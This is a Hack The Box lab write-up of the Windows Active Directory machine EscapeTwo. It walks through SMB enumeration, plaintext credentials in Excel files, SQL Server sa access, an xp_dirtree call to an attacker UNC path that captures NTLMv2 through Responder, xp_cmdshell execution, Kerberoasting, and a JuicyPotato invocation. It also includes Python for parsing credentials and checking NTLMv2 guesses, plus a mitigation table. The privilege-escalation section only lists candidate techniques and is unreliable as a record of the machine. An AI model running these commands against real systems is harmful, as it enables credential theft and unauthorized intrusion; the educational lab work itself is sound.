HTB: EscapeTwo Writeup

Machine Information

Name: EscapeTwo
OS: Windows
Difficulty: Easy
Points: N/A
Release Date: N/A
IP Address: 10.129.30.32
Hostnames: sequel.htb, dc01.sequel.htb
Domain: sequel.htb
Computer: DC01
Author: D3vnomi

Machine Rating

⭐⭐⭐⭐☆ (7.5/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐⭐☆
  • Real-world Applicability: ⭐⭐⭐⭐⭐
  • CVE Knowledge: ⭐⭐⭐☆☆
  • CTF-like Elements: ⭐⭐☆☆☆

Summary

EscapeTwo is an Easy-difficulty Windows Active Directory machine built around three weaknesses: credentials left in office documents on a readable SMB share, a SQL Server whose built-in sa login uses one of those leaked passwords, and a domain service account (sql_svc) that SQL Server runs as. The chain is: enumerate SMB shares with the low-privilege account the machine provides, pull the credentials out of two Excel workbooks, log in to SQL Server as sa, coerce the SQL Server service account into authenticating to an attacker-controlled SMB listener with xp_dirtree (Responder captures the NTLMv2 response), then enable xp_cmdshell and execute commands as sql_svc.

TL;DR: SMB enumeration → credential extraction from Excel files → SQL Server access as sa → NTLMv2 capture via xp_dirtree and Responder → xp_cmdshell command execution as sql_svc → shell and domain enumeration → privilege escalation → Administrator access.


Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.30.32

Results:

53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb)
445/tcp open microsoft-ds Microsoft SMB
464/tcp open kpasswd5 Kerberos password change
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb)
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Service Enumeration

Hostname Configuration:

echo "10.129.30.32 sequel.htb dc01.sequel.htb" | sudo tee -a /etc/hosts

SMB Share Discovery:

nxc smb 10.129.30.32 -u "" -p "" --shares

This checks whether a null session can list shares. The share that matters, “Accounting Department”, is readable by the rose account used in the next step (rose / KxEPkKe6R8su), which the machine hands out as its starting credentials.

SMB Access with Initial Credentials:

smbclient "//10.129.30.32/Accounting Department" -U rose

Initial Foothold

SMB Enumeration and Credential Extraction

The rose credentials (rose / KxEPkKe6R8su) are the machine's provided starting point, an assumed-breach setup in which the tester begins with one low-privilege domain account. Using them, we enumerated the shares the account can read:

nxc smb 10.129.30.32 -u rose -p KxEPkKe6R8su --shares

The “Accounting Department” share contained two Excel files:

  • accounts.xlsx
  • accounting_2024.xlsx

File Download:

smbclient "//10.129.30.32/Accounting Department" -U rose -c "get accounts.xlsx; get accounting_2024.xlsx"

Extracting Credentials from Excel Files

An .xlsx file is a zip archive of XML parts, so its text can be read without Excel: every string cell is stored once in xl/sharedStrings.xml and referenced by index from the sheet XML under xl/worksheets/. Unzipping the workbooks and reading those parts (or opening them in a spreadsheet application) revealed the following credentials:

angela:0fwz7Q4mSpurIt99
oscar:86LxLBMgEWaKUnBG
kevin:Md9Wlq1E5bZnVDVo
sa:MSSQLP@ssw0rd!

The spreadsheets were being used as an account inventory, with passwords stored in clear text next to the usernames. Note the last entry: sa is the built-in SQL Server administrator login, not a domain account, which is why it is tried against port 1433 next.
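As an added worked example (not code from the original writeup), the following Python reads an .xlsx the same way a manual unzip does: it loads xl/sharedStrings.xml, resolves the shared-string references in the sheet XML so that cells land in their real row and column positions, and then pairs a user column with a password column. It builds its own minimal two-part workbook in memory (a constructed sample using the angela and oscar rows from this page; the column headers, e-mail addresses and the numeric cell are invented), so it runs offline; pass a real .xlsx path as the first argument to use it on a downloaded file. Because it only needs the zip container and two XML parts, it also works on workbooks that Excel refuses to open, as long as the zip itself can be read.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# SpreadsheetML namespace used by sharedStrings.xml and the sheet XML.
MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"


def _q(tag: str) -> str:
    return f"{{{MAIN_NS}}}{tag}"


def load_shared_strings(zf: zipfile.ZipFile) -> list:
    """Shared-string table in index order (empty if the workbook has no text cells)."""
    try:
        root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
    except KeyError:
        return []
    # An <si> is a plain <t>, or several rich-text runs <r><t>; joining every <t>
    # gives the visible cell text either way.
    return ["".join(t.text or "" for t in si.iter(_q("t"))) for si in root.findall(_q("si"))]


def _col_number(letters: str) -> int:
    """'A' -> 1, 'Z' -> 26, 'AA' -> 27."""
    n = 0
    for ch in letters:
        n = n * 26 + (ord(ch) - ord("A") + 1)
    return n


def load_sheet(xlsx_bytes: bytes, part: str = "xl/worksheets/sheet1.xml") -> list:
    """Return the sheet as a list of rows (row order), each a list of cell texts in column order."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        sst = load_shared_strings(zf)
        root = ET.fromstring(zf.read(part))
    grid = {}  # row number -> {column number -> text}
    for c in root.iter(_q("c")):
        m = re.match(r"([A-Z]+)(\d+)$", c.get("r", ""))
        if not m:
            continue
        v = c.find(_q("v"))
        if c.get("t") == "s" and v is not None:          # shared-string reference
            text = sst[int(v.text)]
        elif c.get("t") == "inlineStr":                   # string stored inline in the cell
            text = "".join(t.text or "" for t in c.iter(_q("t")))
        else:                                             # number, bool or formula result
            text = (v.text or "") if v is not None else ""
        grid.setdefault(int(m.group(2)), {})[_col_number(m.group(1))] = text
    rows = []
    for r in sorted(grid):
        cells = grid[r]
        rows.append([cells.get(i, "") for i in range(1, max(cells) + 1)])
    return rows


USER_HEADERS = {"username", "user", "login", "account", "samaccountname"}


def find_credentials(rows: list) -> list:
    """Locate a header row with a user column and a password column; return (user, password) pairs."""
    for i, row in enumerate(rows):
        hdr = [h.strip().lower() for h in row]
        pw = next((j for j, h in enumerate(hdr) if "pass" in h), None)
        usr = next((j for j, h in enumerate(hdr) if h in USER_HEADERS), None)
        if pw is None or usr is None:
            continue
        return [(r[usr], r[pw]) for r in rows[i + 1:]
                if len(r) > max(usr, pw) and r[usr] and r[pw]]
    return []


def build_sample_workbook() -> bytes:
    """Constructed sample (not a file from the machine): only the two parts this parser reads,
    with the page's angela/oscar rows. A real .xlsx has more parts; these two are enough here."""
    strings = ["First Name", "Username", "Email", "Password",
               "Angela", "angela", "angela@sequel.htb", "0fwz7Q4mSpurIt99",
               "Oscar", "oscar", "oscar@sequel.htb", "86LxLBMgEWaKUnBG"]
    sst = f'<sst xmlns="{MAIN_NS}">' + "".join(f"<si><t>{s}</t></si>" for s in strings) + "</sst>"

    def s(ref, idx):  # a cell that references shared string number idx
        return f'<c r="{ref}" t="s"><v>{idx}</v></c>'

    rows_xml = [
        "".join(s(f"{c}1", i) for i, c in enumerate("ABCD")),
        "".join(s(f"{c}2", 4 + i) for i, c in enumerate("ABCD")) + '<c r="E2"><v>101</v></c>',  # numeric cell
        "".join(s(f"{c}3", 8 + i) for i, c in enumerate("ABCD")),
    ]
    sheet = (f'<worksheet xmlns="{MAIN_NS}"><sheetData>'
             + "".join(f'<row r="{n}">{x}</row>' for n, x in enumerate(rows_xml, 1))
             + "</sheetData></worksheet>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/sharedStrings.xml", sst)
        zf.writestr("xl/worksheets/sheet1.xml", sheet)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_workbook()
    for user, password in find_credentials(load_sheet(data)):
        print(f"{user}:{password}")
```

Numbers, dates and formula results are not in sharedStrings.xml, which is why a plain `strings` over the unzipped archive can leave you guessing which password belongs to which row; resolving the cell references keeps the columns aligned. Workbooks with several sheets have sheet2.xml, sheet3.xml and so on under the same folder, so pass the part name to load_sheet for each.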

SQL Server Initial Access

With the sa credentials obtained, we accessed the MSSQL instance. sa is a SQL login rather than a domain account, so the default SQL authentication is used (no -windows-auth and no domain prefix); the password is quoted because it contains a `!`:

impacket-mssqlclient 'sa:MSSQLP@ssw0rd!'@10.129.30.32

Once connected, we executed basic enumeration queries:

SELECT @@VERSION;
SELECT * FROM INFORMATION_SCHEMA.TABLES;

Kerberoasting Attempt

While exploring the Active Directory environment, we attempted to identify service accounts vulnerable to Kerberoasting:

impacket-GetUserSPNs -request -dc-ip 10.129.30.32 sequel.htb/rose:KxEPkKe6R8su

Any authenticated domain user can request a service ticket for an account that has an SPN, so the low-privilege rose account is enough. This identified two service accounts:

  • sql_svc - SQL Server service account
  • ca_svc - Certificate Authority service account

Neither TGS-REP hash cracked with hashcat (mode 13100, Kerberos 5 TGS-REP etype 23) against the rockyou wordlist, so this path was parked. The account names are still useful: sql_svc is the identity SQL Server runs as, which is what the next section relies on.

Capturing NTLMv2 Hash via xp_dirtree

xp_dirtree lists the contents of a directory and accepts a UNC path. When that path points at an attacker-controlled host, the SQL Server process opens an SMB connection to it and authenticates with its own service account using NTLM, so a listener on the attacker side receives an NTLMv2 challenge-response. No name-resolution poisoning is involved; this is forced authentication to an address we chose. First, start Responder on the interface that faces the target (tun0 on the HTB VPN; eth0 is shown here):

responder -I eth0

Then, from the MSSQL session, execute a command that forces the SQL Server service account to authenticate:

EXEC master..xp_dirtree '\\<attacker_ip>\share';

This caused the SQL Server service (running as sql_svc) to attempt an SMB connection to the attacker host, and Responder captured the NTLMv2 response in hashcat's 5600 format (user::domain:server_challenge:NTProofStr:blob):

sql_svc::SEQUEL:xxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:0101000000000000c0653150de59d801xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

The NTProofStr is an HMAC over Responder's server challenge, so this line cannot be replayed or passed the way an NT hash can; it is only useful if hashcat -m 5600 recovers the password. Since sa access is already in hand, the following sections continue with xp_cmdshell regardless of the cracking result.
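What the captured line actually contains, and what hashcat -m 5600 does with each guess, as an added example that is not part of the original writeup: the block implements NT hash → NTLMv2 hash → NTProofStr as specified in MS-NLMP and compares the result with the NTProofStr field of a 5600 line. The sample line is constructed by the block itself from an invented password (WinterIsComing2024!) and Responder's default server challenge 1122334455667788, since the real capture is redacted on this page; the forge_capture helper exists only to build that sample. MD4 falls back to a pure-Python implementation where hashlib lacks it (OpenSSL 3 builds without the legacy provider).

```python
import hashlib
import hmac
import struct
from typing import Optional

MASK = 0xFFFFFFFF


def _md4_pure(data: bytes) -> bytes:
    """RFC 1320 MD4, used when hashlib has no md4 (OpenSSL 3 without the legacy provider)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)                  # bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        A, B, C, D = a, b, c, d
        for i in range(16):                                   # round 1: F, words in order
            A = rotl((A + F(B, C, D) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
            A, B, C, D = D, A, B, C                           # rotate register roles
        for i in range(16):                                   # round 2: G, words 0,4,8,12,1,...
            k = (i % 4) * 4 + i // 4
            A = rotl((A + G(B, C, D) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            A, B, C, D = D, A, B, C
        for i in range(16):                                   # round 3: H, words 0,8,4,12,2,...
            k = (0, 2, 1, 3)[i // 4] + (0, 8, 4, 12)[i % 4]
            A = rotl((A + H(B, C, D) + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            A, B, C, D = D, A, B, C
        a, b, c, d = (a + A) & MASK, (b + B) & MASK, (c + C) & MASK, (d + D) & MASK
    return struct.pack("<4I", a, b, c, d)


def md4(data: bytes) -> bytes:
    try:
        return hashlib.new("md4", data).digest()
    except ValueError:                                        # md4 unavailable in this OpenSSL build
        return _md4_pure(data)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is the value hashcat -m 1000 cracks."""
    return md4(password.encode("utf-16le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTLMv2 hash (MS-NLMP NTOWFv2): HMAC-MD5 keyed by the NT hash over UPPER(user) + domain."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: HMAC-MD5 keyed by the NTLMv2 hash over server_challenge || blob."""
    return hmac.new(ntlmv2_key(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def parse_5600(line: str):
    """Split user::DOMAIN:challenge:NTProofStr:blob (Responder / hashcat 5600) into its fields."""
    user, _, rest = line.strip().partition("::")
    domain, challenge, proof, blob = rest.split(":", 3)
    return user, domain, bytes.fromhex(challenge), bytes.fromhex(proof), bytes.fromhex(blob)


def check_candidate(line: str, password: str) -> bool:
    """One hashcat guess: recompute NTProofStr from the candidate password and compare."""
    user, domain, challenge, proof, blob = parse_5600(line)
    return hmac.compare_digest(nt_proof(password, user, domain, challenge, blob), proof)


def crack(line: str, wordlist) -> Optional[str]:
    return next((w for w in wordlist if check_candidate(line, w)), None)


def forge_capture(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """Build a 5600 line from a KNOWN password so the example runs offline; real lines come from Responder."""
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample data (invented; not the machine's real capture). The blob follows the
# MS-NLMP NTLMv2_CLIENT_CHALLENGE layout; the timestamp bytes are the ones visible on this page.
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")            # Responder's default server challenge
SAMPLE_BLOB = (bytes.fromhex("0101000000000000")                # RespType, HiRespType, reserved
               + bytes.fromhex("c0653150de59d801")              # timestamp (FILETIME)
               + bytes.fromhex("aabbccddeeff0011")              # client challenge (invented)
               + b"\x00" * 4                                    # reserved
               + b"\x02\x00\x0c\x00" + "SEQUEL".encode("utf-16le")  # AV pair: MsvAvNbDomainName
               + b"\x00" * 4                                    # MsvAvEOL
               + b"\x00" * 4)                                   # reserved
SAMPLE_PASSWORD = "WinterIsComing2024!"                         # invented for this example
SAMPLE_LINE = forge_capture("sql_svc", "SEQUEL", SAMPLE_PASSWORD, SAMPLE_CHALLENGE, SAMPLE_BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack(SAMPLE_LINE, ["123456", "Password1", "MSSQLP@ssw0rd!", SAMPLE_PASSWORD]))
```

To use it on a real capture, replace SAMPLE_LINE with the line Responder printed and feed a wordlist to crack(). The point is not speed (hashcat performs the same two HMAC-MD5 computations orders of magnitude faster) but to make the structure visible: the proof is bound to the server challenge and the client blob, so the captured value is worthless for pass-the-hash and only a recovered plaintext moves the attack forward.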

Enabling xp_cmdshell

xp_cmdshell is disabled by default (it has been since SQL Server 2005), but a member of the sysadmin role, which sa is, can turn it back on with sp_configure. GO is a batch separator understood by sqlcmd and SSMS, not a T-SQL statement, so in impacket-mssqlclient each statement is entered on its own line; the tool also wraps this whole sequence in its enable_xp_cmdshell helper command.

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Command Execution via xp_cmdshell

With xp_cmdshell enabled, we executed arbitrary system commands:

EXEC xp_cmdshell 'whoami';

This confirmed command execution as the SQL Server service account (SEQUEL\sql_svc).


User Compromise

Establishing Interactive Shell

xp_cmdshell runs one command at a time and returns its output through the SQL session, which is enough for enumeration but awkward for anything interactive. Two ways to improve on it: spawn a reverse shell from xp_cmdshell (for example a PowerShell one-liner back to a netcat listener on the attacker host), or use WinRM on port 5985 with evil-winrm. WinRM needs a plaintext password or an NT hash (-H); the NTLMv2 response captured by Responder is neither, and only becomes a usable credential if hashcat -m 5600 recovers the password.

evil-winrm -i 10.129.30.32 -u 'sql_svc' -p '<cracked_password>'

The same applies to any other domain user whose plaintext password is known, provided the account is allowed to use WinRM (a member of Remote Management Users or a local administrator on the host):

evil-winrm -i 10.129.30.32 -u 'rose' -p 'KxEPkKe6R8su'

Enumerating Domain Users

From the shell running as sql_svc, we enumerated domain users and groups:

net user /domain
net group /domain

Because the target is the domain controller itself, the AD DS tooling is available locally; dsquery lists the accounts under the default Users container, which is where accounts with interesting permissions or escalation paths are first looked for:

dsquery user "cn=users,dc=sequel,dc=htb"

User Flag

The user flag is in the Desktop folder of the user whose account gives the first interactive foothold (type works from both cmd and PowerShell):

type C:\Users\<username>\Desktop\user.txt

🚩 User Flag: <REDACTED>


Privilege Escalation

Enumeration of Privileges

Once we obtained access as a domain user or service account, we checked available privileges and group memberships:

whoami /priv
whoami /groups
net user <username> /domain

Service Account Privileges

A SQL Server service account is normally granted only what the service needs (the service logon right and file-system rights on the data directories), but SeImpersonatePrivilege is commonly present on service accounts, so it is the first thing to check in the whoami /priv output, together with any domain group memberships that grant rights beyond this host.

Potential Escalation Paths

  1. SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege: allows a token-impersonation “Potato” attack. JuicyPotato relies on DCOM behaviour that was fixed in Windows Server 2019 / Windows 10 1809, so on this target PrintSpoofer or GodPotato-style tools are the working equivalents.
  2. Misconfigured service permissions: services running as SYSTEM whose binaries, directories or registry keys are writable by the current user.
  3. Excessive group membership: a service account that is, directly or through nested groups, a member of a privileged group such as Domain Admins or Administrators.

Privilege Escalation Execution

Which technique applies depends on what the enumeration shows. For this machine the candidate routes are the token-impersonation one (the JuicyPotato invocation below is the classic form; substitute PrintSpoofer or GodPotato on Server 2019, where JuicyPotato no longer works):

# If vulnerable to token impersonation
JuicyPotato.exe -l 1337 -p C:\Windows\Temp\shell.exe -t * -c {ClassID}

and the group-membership one:

# Verify group memberships that grant administrative access
net user sql_svc /domain

Root/Administrator Flag

Once administrative access was obtained, the root flag is read from the Administrator desktop:

type C:\Users\Administrator\Desktop\root.txt

Or, from PowerShell:

Get-Content C:\Users\Administrator\Desktop\root.txt

🚩 Root Flag: <REDACTED>


Attack Chain Summary

graph TD
A["Port Scan: 10.129.30.32"] --> B["Identify Active Directory Services"]
B --> C["Enumerate SMB Shares"]
C --> D["Discover Readable 'Accounting Department' Share"]
D --> E["Extract Credentials from Excel Files"]
E --> F["Obtain SA SQL Server Credentials"]
F --> G["Connect to MSSQL via impacket-mssqlclient"]
G --> H["Enumerate Service Accounts via GetUserSPNs"]
H --> I["Attempt Kerberoasting - Hashes Not Crackable"]
I --> J["Use xp_dirtree to Capture NTLMv2 via Responder"]
J --> K["Obtain sql_svc NTLMv2 Hash"]
K --> L["Enable xp_cmdshell via sp_configure"]
L --> M["Execute Commands as sql_svc"]
M --> N["Establish WinRM Shell Access"]
N --> O["Enumerate Privileges and Group Memberships"]
O --> P["Identify Privilege Escalation Path"]
P --> Q["Execute Privilege Escalation"]
Q --> R["Obtain Administrator/System Access"]

Vulnerability Reference Table

  • Exposed credentials in office documents
    Type: Credential exposure | Severity: Critical
    Mitigation: secret scanning over file shares and document stores; DLP policies; move credentials into a vault; security awareness training.
  • SQL Server reachable with a leaked sa password, running as a domain service account
    Type: Authentication / privilege escalation | Severity: High
    Mitigation: disable or rename sa and prefer Windows authentication; never store the sa password in a document; run SQL Server as a low-privilege, ideally group-managed, service account.
  • xp_cmdshell enabled by a sysadmin login
    Type: Remote code execution | Severity: Critical
    Mitigation: keep xp_cmdshell disabled; limit sysadmin role membership; log and alert on sp_configure changes.
  • Weak service account credentials
    Type: Weak authentication | Severity: High
    Mitigation: long random passwords or gMSAs for service accounts; regular rotation; MFA for human accounts.
  • Kerberoastable service accounts (SPNs on user accounts)
    Type: Credential extraction | Severity: Medium
    Mitigation: gMSAs or 25+ character random passwords; AES-only Kerberos encryption for service accounts; alert on event 4769 with RC4 (etype 0x17) ticket requests.
  • Forced NTLM authentication from SQL Server (xp_dirtree to an attacker UNC path)
    Type: Hash capture | Severity: High
    Mitigation: block outbound SMB (TCP 445) from servers to untrusted networks; restrict NTLM where possible; disabling LLMNR and NBT-NS is good hygiene but was not the enabler here.

Tools Used

  • nmap - port scanning and service fingerprinting: nmap -sC -sV -T4 -p- 10.129.30.32
  • smbclient - SMB share access and file download: smbclient "//10.129.30.32/Accounting Department" -U rose
  • nxc (NetExec, the successor of CrackMapExec) - SMB/LDAP enumeration with credentials: nxc smb 10.129.30.32 -u rose -p KxEPkKe6R8su --shares
  • impacket-mssqlclient - SQL Server access, with helpers for xp_cmdshell and xp_dirtree: impacket-mssqlclient 'sa:password'@10.129.30.32
  • impacket-GetUserSPNs - Kerberoasting (request TGS for accounts with SPNs): impacket-GetUserSPNs -request sequel.htb/rose:password
  • responder - SMB listener that captures forced NTLM authentication (also LLMNR/NBT-NS poisoning): responder -I eth0
  • hashcat - offline cracking; -m 5600 for NTLMv2, -m 13100 for Kerberos TGS-REP: hashcat -m 5600 hash.txt rockyou.txt
  • evil-winrm - WinRM shell access: evil-winrm -i 10.129.30.32 -u user -p password
  • nc / ncat - reverse shell listener: nc -lvnp 4444
  • PowerShell / cmd - on-host command execution and enumeration: whoami /priv
  • python3 - scripting and exploit execution: python3 script.py
  • kerbrute - Kerberos user enumeration and password brute-force/spray: kerbrute userenum users.txt -d sequel.htb

Key Learnings

  1. Office Documents as Credential Repositories: Spreadsheets and documents are frequently used to store credentials and sensitive information. Organizations should implement Data Loss Prevention (DLP) policies and conduct regular security awareness training to prevent this practice. Security scanning tools should be deployed to detect and remediate exposed credentials in documents.

  2. SQL Server Default Configuration Dangers: SQL Server installations running with default or high-privilege configurations present a critical security risk. The sa account should never be used for application connections, and unnecessary features like xp_cmdshell should be disabled. Principle of least privilege should be applied to all service accounts.

  3. Service Account Abuse: Domain service accounts with SPN entries are vulnerable to Kerberoasting attacks. Strong, unique passwords for service accounts and regular password rotations are essential. Additionally, monitoring for abnormal Kerberos ticket requests can detect active exploitation attempts.

  4. Forced Authentication Is Enough: Responder is usually discussed alongside LLMNR/NBT-NS poisoning, but no poisoning was needed here. Any server feature that will open a UNC path chosen by a low-privilege user (xp_dirtree, xp_fileexist, a file-upload or backup path, an image link in a document) hands the service account's NTLM response to whoever controls that address. Disabling LLMNR and NBT-NS is still worthwhile, but the controls that matter for this class of attack are blocking outbound SMB from servers and limiting NTLM.

  5. Defense in Depth Critical in Active Directory: This machine demonstrated that a single compromised credential or misconfiguration (exposed Excel file) can cascade into full domain compromise. Implementing multiple layers of security controls—encryption at rest/in transit, multi-factor authentication, privileged account management, and continuous monitoring—is essential to prevent lateral movement.

  6. NTLMv2 Capture via a UNC Path: built-in SQL Server procedures such as xp_dirtree take a path argument, and a UNC path turns them into a forced SMB authentication from the service account. The captured NTLMv2 response is a challenge-response value, not a reusable hash: it must be cracked offline and cannot be passed. Organizations should egress-filter SMB from database servers and alert on SQL Server processes making outbound connections to port 445.


Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal. The techniques and vulnerabilities discussed should only be used in authorized penetration testing engagements or on systems you own or have explicit permission to test.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Windows #ActiveDirectory #Easy #SQLServer #Kerberos #SMB #LLMNR